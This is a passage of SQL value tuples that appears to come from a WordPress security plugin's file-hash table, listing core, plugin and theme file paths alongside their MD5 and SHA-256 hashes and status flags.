(0x44f1ff16e46d5a29443bac4225913e49, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_less_24px.svg', 0, 0x431503d1600342d139f702b8df9f562c, 0x431503d1600342d139f702b8df9f562c, 0x7262aad13d5074b8a66c9c43351677bff2ec641d4e794ca961527ea155c56bb4, '', 0, '?'),
(0x44fdbf897a20ed800e694328de1cdb3d, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/safe.svg', 0, 0x2567de8d7afa8cdd814d71b6ccbb480f, 0x2567de8d7afa8cdd814d71b6ccbb480f, 0x8271dd7dbdf45f8ac1420951dcf5ddb0ca50e3333588f4a4e267ece39bd0a4aa, '', 0, '?'),
(0x4523cdd5e72d7633371903d936ebc5a4, 'wp-content/plugins/wordfence/wordfence.php', 1, 0x00000000000000000000000000000000, 0x3a71cc704cc08551a9d72b790d814ad9, 0x82f2b6d85766c317a601e593d38cb6dae49dc8c540177c45baa5ceacd455c7e3, '', 0, '?'),
(0x452c6b4f629ff0ac83e4bee76e9a496a, 'wp-content/plugins/js_composer/include/templates/pages/vc-settings/vc-automapper.php', 0, 0x89d07ff8469648f79e227de83a4ba480, 0x89d07ff8469648f79e227de83a4ba480, 0x151bf8a1985efdb8bfe286a642432065e33e9647c71a798a7139b422d63b87f6, '', 0, '?'),
(0x452f216dd184de6471b49d5fda31c6e7, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_scan_wifi_24px.svg', 0, 0xc6575f13a24d4a08a9ce7898787c5a48, 0xc6575f13a24d4a08a9ce7898787c5a48, 0x3e250863f375d1a23304a44cd1977e2719a6483928d0bffb050761c5d92caece, '', 0, '?'),
(0x4534edd766750d23523a6b211e6a6768, 'wp-includes/js/wp-list-revisions.min.js', 1, 0x00000000000000000000000000000000, 0x6bca22d5b17b85037767147333536b25, 0x4455833f304411b8a008a1f0b4e0b4e63b65091ad4e1d0b23214d98ff1a8f58c, '', 0, '?'),
(0x4535fc3bd5d6dcd8745282939d244cd9, 'wp-includes/js/dist/element.min.js', 1, 0x00000000000000000000000000000000, 0x5a9a26812516f2b3cbf83f89de6142f3, 0x3e41ef4077832a1cf654b9d2b916b07fb8a346f0c756e35cafe2f587cbe6a2e6, '', 0, '?'),
(0x453bf4724d2bec65f49126b751cc3366, 'wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_dragndrop.tpl.php', 0, 0xe1adc111e5c3a02be78e615fa5635ee8, 0xe1adc111e5c3a02be78e615fa5635ee8, 0x92a0678206c7ddcd6c1b517435a87f43a6ce6e5fe8e5813a1a039ae7f0ea1397, '', 0, '?'),
(0x454c062fa3d293131a97c45b83a9a5c7, 'wp-content/plugins/revslider/public/assets/assets/sources/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x455b404e5cfbfcb938be107db6cf2bb1, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_0_bar_24px.svg', 0, 0x3eab91bc2bc47e0550d4869c297b382a, 0x3eab91bc2bc47e0550d4869c297b382a, 0x9fb7b9b02b70464cb0c39a60cf6eef6e02a9ea9f574f77874111c6278eb02cdf, '', 0, '?'),
(0x45616fd00d67f3eadcbc5ddb0c37ff58, 'wp-content/plugins/revslider/admin/assets/imports/web-product-light-hero/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x4568fba1b0cbfdedb9ecd0406171bb8c, 'wp-includes/session.php', 1, 0x00000000000000000000000000000000, 0x03e81670ca426343d0c8ce7990a3fa9f, 0xbca7415c684e7980ca22c6446793d3b116bc442542e0f662688c282699c5e40a, '', 0, '?'),
(0x45732edddd57f68ce8311a7c7ec1f93e, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_alarm_on_24px.svg', 0, 0x939e9b47895e9eb9f428f033cf0a6a6e, 0x939e9b47895e9eb9f428f033cf0a6a6e, 0x9d3f4e6f2175a685d93d454843f7c2f1750e9c7989e28763c4e00c073a118a6e, '', 0, '?'),
(0x4584bb28fd7a5241313b654ec7714433, 'wp-content/plugins/wordfence/index.php', 1, 0x00000000000000000000000000000000, 0x32c101e865d8c2c2aaadeb5cc6c16f67, 0x839720a98a6fabece9b9164da24a2391417c98df8ef519289edd3b0136520af0, '', 0, '?'),
(0x459c7dbe7eee17a54dcac52ddb5d8861, 'wp-admin/css/widgets.min.css', 1, 0x00000000000000000000000000000000, 0xcb7baee9f7277ad7a550f10e038c4d35, 0x2041d5b289b5a474b3b7caf42264e48ab7cf3eac6f047b9e5461cee81870c4d3, '', 0, '?'),
(0x45b856e0f3f72cd525a6d72c53124d3d, 'wp-admin/ms-edit.php', 1, 0x00000000000000000000000000000000, 0x16d42ff617c4a616c3bd94ba103a4582, 0x8789abe695944c603b1cf74169805ee34fbddb7eb7881cb74daedd3a6592229e, '', 0, '?'),
(0x45b87ff5984d567a87fb0999019b9fb7, 'wp-content/themes/Impreza/framework/config/theme-options.php', 0, 0x421cbad2dd1ff6a3594960a2da2d7e30, 0x421cbad2dd1ff6a3594960a2da2d7e30, 0x20bf9376a8a9cd99a3167ced82233c47cafd0b302c6bb15ef93a9b79efcef238, '', 0, '?'),
(0x45d21f1c3ceae5ca82d0da0db6d0ac94, 'wp-content/plugins/revslider/admin/assets/imports/notgeneric/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x45d6037c7da29ecfe47ae1424d3e0598, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/phone.svg', 0, 0xe1c04925ebb62bc6fc02a75338163f07, 0xe1c04925ebb62bc6fc02a75338163f07, 0x8500bfb7b5a5b76d8e70eb82ed46b40bd2fad2fa7511742b1d0c127851486236, '', 0, '?'),
(0x45e9423341c705c9f42d0ddc2621d554, 'wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php', 1, 0x00000000000000000000000000000000, 0xe70fb743f5470a64d2e1b8e46e4d76dc, 0xe7afbaf58e7785a0c7464f5e0e8c206026db1c7cef702e30ec458429b71a4c07, '', 0, '?'),
(0x45f6964dab160c5a3b8878243e3a5f7e, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_usb_24px.svg', 0, 0x53dd472a876deac9348969c3f61d5310, 0x53dd472a876deac9348969c3f61d5310, 0x89516506610378d7e2b648a324a848752adccdc28d27b0ab29cb0267e1fb9100, '', 0, '?'),
(0x45f7d5971bb85f473c9d109e9b93bd5e, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_add_alarm_24px.svg', 0, 0x5d1134263f0da75234a49ac1e8bb894e, 0x5d1134263f0da75234a49ac1e8bb894e, 0xa897d1959c7e9099eea33d2b81eaa33a730976624f35c7302e0d8a23d4003064, '', 0, '?'),
(0x45f95ffaaf6bb1ccea4b7576e16f32bf, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/newspaper-pen.svg', 0, 0xf3edfbd28688ef0bfa337202c1c7506e, 0xf3edfbd28688ef0bfa337202c1c7506e, 0xc9a54a217f680648f937e225ed5aa22248533b8624309f61f4d39f966169b239, '', 0, '?'),
(0x46019648c89d6ceb6593c916011b23dd, 'wp-includes/js/tinymce/skins/wordpress/images/more-2x.png', 1, 0x00000000000000000000000000000000, 0x6c2cd70b1c8972cf25b85e1e78a5251e, 0xfeea14c3593dd15f14ae62b0bb7ccaa726662cac0b893c16bcc3038fa3b6a4a8, '', 0, '?'),
(0x460ca5bcc53987454357542de5c7b13e, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_file_upload_24px.svg', 0, 0x6fd2e0a80cd4537b9c0890212b727cbc, 0x6fd2e0a80cd4537b9c0890212b727cbc, 0x4a7fce688a03b1e5e3af8b238ab4b901336dc4a463ecda8e8c3233e822fee57d, '', 0, '?'),
(0x460d992c403eef9f00bbaaa2b14f7264, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lightbulb.svg', 0, 0x9d2dc4597246e51e4e4fd0d6ae0bc1b8, 0x9d2dc4597246e51e4e4fd0d6ae0bc1b8, 0x63912a0af606c1b1f381e5dfa158fd4c70aea4be4beb48119d0f6f3daf80ad49, '', 0, '?'),
(0x460dba78d3777edb0ddcb1b4e71b0aa6, 'wp-includes/widgets/class-wp-widget-search.php', 1, 0x00000000000000000000000000000000, 0x89715deb2e95fa75dbffb170d0c4be3f, 0xf564d8f59389ca04bddc78638bc626deb9981438bb4ea8ba0ff6805bf81b9660, '', 0, '?'),
(0x4624bad2954373d4e008804cc0c63027, 'wp-content/plugins/revslider/admin/views/system/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x4630890e363cbf2c41cce92d4bdee35e, 'wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_icon.php', 0, 0x403ffdfc230338b4df5e54e603305dc0, 0x403ffdfc230338b4df5e54e603305dc0, 0x7ab99948ea9111749c1177024ace1374abd57bed13f7397669c3b257ebeba35c, '', 0, '?'),
(0x463123833af418d1c12fac6d812e693d, 'wp-content/plugins/js_composer/assets/js/dist/edit-form.min.js', 0, 0x125ea74f5e32c65f4330b0a12b9c2097, 0x125ea74f5e32c65f4330b0a12b9c2097, 0xbd5e43dfb5033d7e0275070fa4507583f08466edd135e7cced53a0c9b97ac994, '', 0, '?'),
(0x46312b1a23f72b6405d37b1c8b77ce7b, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php', 1, 0x00000000000000000000000000000000, 0xfe2e4436b7709f699a7260b66677de3d, 0xc432c97fb14b4a0e37143386f178a732da4d32b0ae26982bb78c954cfc87134c, '', 0, '?'),
(0x464690768c91563b76f0382f9e0db58f, 'wp-includes/SimplePie/Misc.php', 1, 0x00000000000000000000000000000000, 0xcecde679c62dd50207d8d25ece1a4b89, 0xec5be6804aabfa8a8b4bc7ba971994b6c16e33e360f12c00bb6408df152c6d1b, '', 0, '?'),
(0x46488c8ebc3301306d8f3abdb8739bb6, 'wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png', 1, 0x00000000000000000000000000000000, 0x7852de09ac59b5589ed4dbdda4e4dee6, 0x6da6c1bf1a63bca7971cc4adcdf3b6bd5d03f0efec8a5b88d45ede5085b71477, '', 0, '?'),
(0x4655cb43bf34551c4f25e8fa390bc84f, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_track_changes_24px.svg', 0, 0x894e5a6e6e4dae4170f13a9d07fd376b, 0x894e5a6e6e4dae4170f13a9d07fd376b, 0x90f165cc39121f8eb328bb078855fb407b0979f8d595cb480297ce3f70457023, '', 0, '?'),
(0x465934f60f004d229f0742c023260884, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_2_bar_24px.svg', 0, 0xb33870bc5f01e97c274677fa6e3247b8, 0xb33870bc5f01e97c274677fa6e3247b8, 0x1406ff4f1fb10b53babf344203a51b65c47068c235d1dd124730939082f21de0, '', 0, '?'),
(0x466e25c696f89ec77c7dc95538922160, 'wp-content/plugins/revslider/includes/framework/plugin-update.class.php', 0, 0xd4a1e7e32b1051880c3903319cf2ac96, 0xd4a1e7e32b1051880c3903319cf2ac96, 0x98d9e14db44b932150f44ac7d64edf7afdb5e2d8679d344f7b7fdc66abaf6ac8, '', 0, '?'),
(0x4672858675926dba880997455d8643b6, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_blur_circular_24px.svg', 0, 0xc4b7aedebea845ad772857443ecda9e6, 0xc4b7aedebea845ad772857443ecda9e6, 0x3a75c4dc5ad705e122cab55caa0cade0306f50acf8eef6cf01785c8e239b55d4, '', 0, '?'),
(0x467cf70f9c0ca7a777dc5a512c4f97fe, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey', 1, 0x00000000000000000000000000000000, 0x36dae3cf3fd10ae5093aaec29b7b5125, 0x84df0e975aaa494b2f49b5f877c2a51312914f76799b45f80c42695c24478b26, '', 0, '?'),
(0x469e8d9002ec426515e168d2da719e8b, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-recentcomments.php', 0, 0xec93a0804c5eb08e800be408580e81f1, 0xec93a0804c5eb08e800be408580e81f1, 0xb2c01fb0bd79603789c4f0882a12919690d34fdb2bd32b0630ec8a453ac40077, '', 0, '?'),
(0x46a16ec465b65495fe26600edf04b84a, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/admin/js/mapping.js', 0, 0xf52ed153131dcd3dc5dbff9668f6aa9a, 0xf52ed153131dcd3dc5dbff9668f6aa9a, 0xec4cea8db3f71e6e9c4eeee71a221ad70544c05ef4b91c1427fef1e997368986, '', 0, '?'),
(0x46ad175cba431c3fcc5ad6faf6d6fd1d, 'wp-includes/css/customize-preview-rtl.css', 1, 0x00000000000000000000000000000000, 0x36571e36be8cce5ed3cce6974430b474, 0xe7ca65d4ac923b171ee96db0d1ae4fce4d8b340fec0073d1d56d4c7b1a3ab820, '', 0, '?'),
(0x46c101f4acc3835c9f4fe7a1660c67ee, 'wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png', 1, 0x00000000000000000000000000000000, 0x1ecaee31ec029ded0e18f576958a5214, 0x4e3347d127b260cef78f2b523ea2505d45ebfaceb3672fff623f8fac1ea85558, '', 0, '?'),
(0x46d027a342a42fed34087b4acd7b1777, 'wp-admin/js/edit-comments.min.js', 1, 0x00000000000000000000000000000000, 0x702d78113dd95f8b0bb2df8cb3192a3a, 0x639973ce260548bc10bc91fac9e883008922c97528a00e55751921a5ada16ae3, '', 0, '?'),
(0x46f3c2ef3fe689433b248ce948190d0d, 'wp-admin/css/color-picker.css', 1, 0x00000000000000000000000000000000, 0x0e1541a8fb8c53e12386575a492301da, 0xc9d46137f3d4c30c83fb2cca0654b18790dcd3b1bb9a8a012be77bcea384d119, '', 0, '?'),
(0x46f55697c8ebf7c1b94f6425cb7c758b, 'wp-content/plugins/wordfence/images/wordfence-logo.svg', 1, 0x00000000000000000000000000000000, 0x70dce8b1d1c75dea6a2de39114f8a699, 0x389afc05bbd4da23cc84280338f8e1ff884ffb227fc7092b186822466296ec83, '', 0, '?'),
(0x470619d13880bdd243fa0ee4092bfa7b, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-chart.svg', 0, 0xd7fbb7baa995c670a825684b4a4c7cb4, 0xd7fbb7baa995c670a825684b4a4c7cb4, 0x501ac6c2245127f083c2a834899976a57dcc590dc24b859a806a84280cb1dff6, '', 0, '?'),
(0x470953f843cff9fe096a97c9695b76c5, 'wp-content/themes/Impreza/framework/templates/form/form.php', 0, 0x051212a492e475ee24a7dee824cd39f9, 0x051212a492e475ee24a7dee824cd39f9, 0x6561c8a630d363617ca8318a417762b23f9292e9f4f2e184e4a4618df14ecdc7, '', 0, '?'),
(0x4710e22893acff78b2ea150a5e8002ae, 'wp-content/plugins/revslider/admin/views/templates/slide-selector.php', 0, 0x752f8b4512eb8a7efe9bb9f179fcc0db, 0x752f8b4512eb8a7efe9bb9f179fcc0db, 0xce50efd27fd92c229476f243ccb7e340ac5de8cb8693f00114d926400f6c92d3, '', 0, '?'),
(0x4718441de8891d77ade7247eb473b69e, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_drama_24px.svg', 0, 0x1b7802ae0f2e322d53d260c8ae4ebf04, 0x1b7802ae0f2e322d53d260c8ae4ebf04, 0xe9b86e2ab7c68b8c092431bd7d7d795080ae5bc541d02d2eae7d07ac9c3d9d8e, '', 0, '?'),
(0x47205865f4b778efc577305cc96f0338, 'wp-includes/Requests/Response/Headers.php', 1, 0x00000000000000000000000000000000, 0x1ad7c382d2b68f19412da7f43e63a960, 0xec45890ac34617098d09e47ff5b2034dabc3df257bc5df617f91f0da602ce0b1, '', 0, '?'),
(0x47264da54d5c42aca51aeacf84a180e2, 'wp-content/plugins/js_composer/include/classes/shortcodes/rev-slider-vc.php', 0, 0xe815eca7d8fd83ce91c39454885f3336, 0xe815eca7d8fd83ce91c39454885f3336, 0x4258a477eeea325702aa4dfa727ab6fda9359d8329147966ae558c88fe4e631e, '', 0, '?'),
(0x4727faddec6037cd0bb12904ccbc5cac, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_4_bar_26x24px.svg', 0, 0x5ad94abad658cca612a25af0d2fac0f9, 0x5ad94abad658cca612a25af0d2fac0f9, 0x47fd8b40f9a4462ce2b30be775917ee37892b7836c6e94487000392466277055, '', 0, '?'),
(0x4729a29a544f98099e794ff9699a5982, 'wp-content/plugins/revslider/admin/assets/imports/levanorestaurantbar/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x473655e632001e3152fcb8938da2cf4a, 'wp-admin/js/theme.min.js', 1, 0x00000000000000000000000000000000, 0xb8f4f7a4ef5b0b9b56265ce6876b20f4, 0x36fd306ff3d953e7887602cf1aba92bf802e948247b0a9b77493ce7dc9767b34, '', 0, '?'),
(0x473a5ab903d75d59217449afafa1dc22, 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfBBc-AMP6lQ.woff', 1, 0x00000000000000000000000000000000, 0xda6a4937389f7b92b71c06720bc950ad, 0x556b85fae606b486bff45a1c4d073d4f4577a844b2948a7787e8207c1d49bc3b, '', 0, '?'),
(0x473d7ae0313d859370f81f3f1a5469dd, 'wp-content/plugins/wordfence/js/knockout-3.3.0.1579191227.js', 1, 0x00000000000000000000000000000000, 0xa2d65ff1c1198342386c635ee984d207, 0x123516e94aaa3968fdf1414c67168799408260c37577ac6fa3db33c9ce00493e, '', 0, '?'),
(0x4751576316adb5a2e4ae89ca497d3828, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_front_24px.svg', 0, 0xaedd4e834c36ca1c57f8e31b86160778, 0xaedd4e834c36ca1c57f8e31b86160778, 0x396f7870287e879e0187de13eac6e58ff28338a3894e99ab8ef1c3e2b03d2999, '', 0, '?'),
(0x4764dfa51e4282aff477bb2da868abe1, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/design-loop-style01.php', 0, 0xff19b71b8faf1d176b1eba382882d44f, 0xff19b71b8faf1d176b1eba382882d44f, 0xeac7030a201d44cc4565474d1cdeb52fffe08d794d1ed4ff268cde69ed2a49ee, '', 0, '?'),
(0x476ca188aff5108f3e4712efe2b0ce9a, 'wp-content/plugins/revslider/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x476db9993a86074dc4be56c0914cd089, 'wp-includes/js/tinymce/utils/editable_selects.js', 1, 0x00000000000000000000000000000000, 0xa14a93897132a4a24927c64a9739ff45, 0xbf7603e0a1d1476a73dfdd1f66999f0965aa64c926e4a567b7071eff2ba1f6cb, '', 0, '?'),
(0x476dd4bb2697ebcfd0f2101cd6f1a96b, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-zone-c.php', 0, 0xb154892f2cc9c010da8d168ab67ce23a, 0xb154892f2cc9c010da8d168ab67ce23a, 0x54a91b0e42dc46d70b53a16f77d1c7b54de63736ea8cb7775b220f4216e41afc, '', 0, '?'),
(0x47751db9a2d8e8fe05d2d210d2caadf2, 'wp-includes/class-wp-meta-query.php', 1, 0x00000000000000000000000000000000, 0xcc71e4acec11a94a4d618ec56869a3f2, 0x87b9ef84e3cffccda39a46f352874f9caff6194864d501ce3819ca987e47132a, '', 0, '?'),
(0x4775358913021fc37f9561d4afdef6a7, 'wp-includes/rest-api/search/class-wp-rest-post-search-handler.php', 1, 0x00000000000000000000000000000000, 0x42a6a52fd1121ea0276a9f9ee34048e8, 0xb71be05780c80a4e14122085ee9e264013942505cb6d49fc3171833e8707740e, '', 0, '?'),
(0x4775b55ea82f31c6d40fd58153f18e37, 'wp-includes/atomlib.php', 1, 0x00000000000000000000000000000000, 0x3e422f1490ddaf417a29bb9e41114dab, 0x48a2b34c07a8f2c9f8f7c6bbdad39bd876a92471a6ea442487f314ed64eb74b3, '', 0, '?'),
(0x47803971f3f1eb3dcaa55b333f1961e8, 'wp-admin/images/bubble_bg-2x.gif', 1, 0x00000000000000000000000000000000, 0xcfac1d71069a6a99198c0a8a1358c23c, 0x6eacbc250134eb078f4c18a6a9ed367b812fd0a25bacc4ac173f58575f412e72, '', 0, '?'),
(0x479637181a089ee6b249263aed190778, 'wp-admin/edit-form-comment.php', 1, 0x00000000000000000000000000000000, 0x8980aac336109682deb554cf3d162c0c, 0x0844c89efbc67069275c0f1dde94e74f06105ecd981ff03bcc7a1552a4113ce8, '', 0, '?'),
(0x47b133731efc71d9b4c2df4660a66afd, 'wp-content/plugins/js_composer/include/classes/core/class-vc-post-admin.php', 0, 0x366395befe276ea92e72b1cfbd4d3d93, 0x366395befe276ea92e72b1cfbd4d3d93, 0x2cacbd7e4411f9d8f268521dd7f19fbc7ac7d8d59253295d46220d1e7d90ca71, '', 0, '?'),
(0x47c46b8b307a19ca596bf3494da6bc91, 'wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1579191227.css', 1, 0x00000000000000000000000000000000, 0x2965edf466d523a160509e7e37c4146e, 0x2d6dedc67aeddc6ee04eca1646fb4500d1ad5c7671eb9d734c3f975a121ab2bd, '', 0, '?'),
(0x47dfc23e73a008dfbc7acf9040aee6c8, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money.svg', 0, 0x35ff9ad5be8952f7c7c51817385c358c, 0x35ff9ad5be8952f7c7c51817385c358c, 0x352e571b26038bc4c7efce148bd365ba21503b29ed883a598586a3eee0218b43, '', 0, '?'),
(0x480f538d47e3d576ac65beb049025e3a, 'wp-content/plugins/revslider/admin/assets/js/jquery.tipsy.js', 0, 0x5a4f11bec90d01c15b537ccff6d9f1d7, 0x5a4f11bec90d01c15b537ccff6d9f1d7, 0xfe62472439934391add1b872d6496e2bb7b33fdb511cada1dda426aa71704847, '', 0, '?'),
(0x480ff1fd598d03665548e87584706401, 'wp-includes/Requests/Exception/HTTP/400.php', 1, 0x00000000000000000000000000000000, 0x51e56e878cbb564ab852c978fb35fcd0, 0xb364ab3ec4f786bcba09a269ec481caebaacdf6224aa269e6ee8e0ea3697701a, '', 0, '?'),
(0x4815b3b840bff6863407e8670aee4bdf, 'wp-content/plugins/js_composer/include/params/vc_grid_item/class-wpb-map-grid-item.php', 0, 0xd5b33d4dbb5240cdd4c6423bb4a7c1d6, 0xd5b33d4dbb5240cdd4c6423bb4a7c1d6, 0xe172e61f14cfeb3d358674bc6eb5f53d3bd37502526c9b9a41b98e4c72fa129d, '', 0, '?'),
(0x482b80457e997d0ea73151dbf0bdaed9, 'wp-includes/js/wp-util.min.js', 1, 0x00000000000000000000000000000000, 0xd7d084f508f3d6965efc4be3bcfa255e, 0x37dc0d03afe42db43a20e72088e526bb6444cd637670279652c1ec49e4a8eba8, '', 0, '?'),
(0x48329e15e1413b8527d8779cfa80331d, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Responsive.php', 0, 0xc818112c216b7fd41ac469c5e5239e97, 0xc818112c216b7fd41ac469c5e5239e97, 0xaa2873034fc0ecd0a2c0ed1c336c479206b4ac4db7b24249cc499f15546f72fe, '', 0, '?'),
(0x483f44bca784da893fe17e7aa10aa005, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_returned_24px.svg', 0, 0xa3fc497debe8df5c120f9dc89d35dfc2, 0xa3fc497debe8df5c120f9dc89d35dfc2, 0x05ee4ab3119bd3389828966c4b96801abea05ae915b2c05fbc4a73c9981e4aa0, '', 0, '?'),
(0x484184b8fe66be2cc1f5e424462dee16, 'wp-admin/css/customize-nav-menus-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x215fb1ca4140dd402b16a6316067064a, 0x63b4f19dd447971bf0d22ea32d2c467fc9afd5aaf4f8abf832974f381f3c6d21, '', 0, '?'),
(0x484768270fdfc178fa5287bc8e7e170a, 'wp-admin/js/customize-nav-menus.min.js', 1, 0x00000000000000000000000000000000, 0xe099bc0d6b8f5ec1bbe943f308e658a1, 0x183472aa56ce3a9837a237dcffe63d493b5206453fe20de545aca34e7a2d6209, '', 0, '?'),
(0x4852254e5fe2736da77e1734bdc06866, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money3.svg', 0, 0x92474a88635f9db11fc4d228401f09c5, 0x92474a88635f9db11fc4d228401f09c5, 0x5b800c0f37a40423e653eb0c7629f285944c470e2379006a5aa6bf7ce6783f5b, '', 0, '?'),
(0x4860b05c07f120e69c72b2a7b759ea43, 'wp-admin/includes/class-theme-upgrader-skin.php', 1, 0x00000000000000000000000000000000, 0xc4724da2062cc97d31ec6fae9f993518, 0xca45274a461d7722f5e4e33948d58320ee8788820de64985d35127c744c56006, '', 0, '?'),
(0x4877a90071218161d41ce13751781738, 'wp-content/plugins/js_composer/include/templates/editors/partials/settings_presets_popup.tpl.php', 0, 0x86b0718ebf6e5cbd54311443f131d932, 0x86b0718ebf6e5cbd54311443f131d932, 0x5a094d5b08f6fd558659e11e993966fdd42cce96b23ef7dab72ccb636207c45a, '', 0, '?'),
(0x48865fe994c997fc30a1a6c7e0af55f3, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_stats_counter.php', 0, 0x92fbb1e4c316ed6a5869cce71e0d7f24, 0x92fbb1e4c316ed6a5869cce71e0d7f24, 0x25c4d43528ecf7a397852b60d76a2a9aac5959b09dec3fd51fc7997a7b0c57c9, '', 0, '?'),
(0x4892a23ec666ed3e41dfe9a05f7cf4ec, 'wp-content/plugins/js_composer/assets/js/dist/backend.min.js', 0, 0xeed2cd2e7a7c30e38c23ff9fd64cdd8e, 0xeed2cd2e7a7c30e38c23ff9fd64cdd8e, 0x455d81a8a53f5f335fef9e58ea19e08629a1f2424f02cd8ee51e3da73bad08d1, '', 0, '?'),
(0x489e1e4ecc350aeaf244d12c506f0e84, 'wp-content/plugins/wp-super-cache/plugins/wptouch.php', 1, 0x00000000000000000000000000000000, 0x1ebf0bbcda9224f7f8d08cc5d0e40701, 0x5fb2fa5472b820e71f98d5a11eb962a9e24ded91e39e81e5b527f6826986969f, '', 0, '?'),
(0x48a53b19c8d40a19e884afc840eb40ad, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/carousel.min.js', 0, 0xa525fb1675ad458881414b49bb13ee8e, 0xa525fb1675ad458881414b49bb13ee8e, 0x4a5c3de2d32e253bc66b969e8dbb9e19a4fdcbb5cec41729f1b2c616e097bd1f, '', 0, '?'),
(0x48b7a859366fefe3447b884c48ea1698, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php', 1, 0x00000000000000000000000000000000, 0x1a986cec878c31e267bc1fe6a8184591, 0xb8c0b53bc8c37d2d1afdda1109bf556429ddfaab05d473c544ca2517e952e1fa, '', 0, '?'),
(0x48c3bdcdf16919ed5abe552c4818bb4c, 'wp-admin/includes/meta-boxes.php', 1, 0x00000000000000000000000000000000, 0x38011ecae4f68272e566df8f19913f2b, 0x69e44a21c38622456609f69fa1292d91a6d118734bf182614014f5d9e842672c, '', 0, '?'),
(0x48c3f8dccd43a95470285eded96cedbc, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php', 1, 0x00000000000000000000000000000000, 0xaec7fcd9a367c2f15220c833d7edfb0c, 0x7dc9e77bee0ba896638856b393227a399cdcc44e59cb381db5e2f3050e4a5705, '', 0, '?'),
(0x48c4ba307003eae8e69ad0dd2753d8f4, 'wp-content/plugins/js_composer/include/classes/editors/navbar/class-vc-navbar-frontend.php', 0, 0x20bbcf1d101d7f3ed40c0d75fa17827c, 0x20bbcf1d101d7f3ed40c0d75fa17827c, 0x319ab59c2850cffcb76a7d52059020890666ac277002ae8c9500b9a56ff6fde9, '', 0, '?'),
(0x48d4d6dffe1286a896cb302107217ec3, 'wp-content/plugins/js_composer/include/templates/shortcodes/layerslider_vc.php', 0, 0x3953ecdeaf2d937c521888c6f81acac8, 0x3953ecdeaf2d937c521888c6f81acac8, 0x4745f00973c2e821f827c19177a8889c00ed72e39c1e74aa461633b76cf21b73, '', 0, '?'),
(0x4905528e93763ac15169e961ab1568d8, 'wp-content/plugins/js_composer/config/content/shortcode-vc-toggle.php', 0, 0x1d7be2fa3d8fa86a3bdcc03ecc2ab52f, 0x1d7be2fa3d8fa86a3bdcc03ecc2ab52f, 0x2306eb9ac3ffb788f536ac8cd24216e738493811af74cd49c23852aa4b669e77, '', 0, '?'),
(0x491057ef9339d96180d61b579cb13328, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php', 1, 0x00000000000000000000000000000000, 0x67bc860c990a1b94bc34789025243081, 0x165e2c87fe8c90cd357f19a9111dd88e6a882cadba1bd2a78b511c99d5516873, '', 0, '?'),
